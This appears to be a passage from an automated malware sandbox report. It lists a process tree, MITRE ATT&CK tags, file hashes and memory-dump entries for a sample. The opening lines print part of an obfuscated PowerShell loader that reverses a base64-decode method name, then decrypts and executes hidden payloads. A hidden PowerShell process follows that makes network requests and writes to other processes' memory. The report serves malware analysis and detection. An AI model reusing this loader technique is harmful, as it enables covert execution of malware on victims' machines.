'/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2960
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:5064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4952

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4884

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_suiqo4zi.0yh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1012-79-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/1120-69-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/1292-76-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/1524-74-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/1652-77-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/1716-75-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/1764-73-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/1892-65-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/2232-66-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/2392-67-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/2400-78-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/2556-71-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/2764-80-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/2960-15-0x000002CB6FC60000-0x000002CB6FC68000-memory.dmp

Filesize
32KB

Download
memory/2960-13-0x000002CB6FC80000-0x000002CB6FCC4000-memory.dmp

Filesize
272KB

Download
memory/2960-116-0x00007FFE10540000-0x00007FFE11001000-memory.dmp

Filesize
10.8MB

Download
memory/2960-16-0x000002CB6FE20000-0x000002CB6FE7A000-memory.dmp

Filesize
360KB

Download
memory/2960-115-0x00007FFE10543000-0x00007FFE10545000-memory.dmp

Filesize
8KB

Download
memory/2960-0-0x00007FFE10543000-0x00007FFE10545000-memory.dmp

Filesize
8KB

Download
memory/2960-112-0x000002CB6FF20000-0x000002CB6FF60000-memory.dmp

Filesize
256KB

Download
memory/2960-14-0x000002CB6FEA0000-0x000002CB6FF16000-memory.dmp

Filesize
472KB

Download
memory/2960-99-0x00007FFE1E4D3000-0x00007FFE1E4D4000-memory.dmp

Filesize
4KB

Download
memory/2960-1-0x000002CB6FA00000-0x000002CB6FA22000-memory.dmp

Filesize
136KB

Download
memory/2960-12-0x00007FFE10540000-0x00007FFE11001000-memory.dmp

Filesize
10.8MB

Download
memory/2960-11-0x00007FFE10540000-0x00007FFE11001000-memory.dmp

Filesize
10.8MB

Download
memory/3520-64-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/3520-17-0x00000000026D0000-0x00000000026FA000-memory.dmp

Filesize
168KB

Download
memory/3540-72-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/3660-70-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/4884-68-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download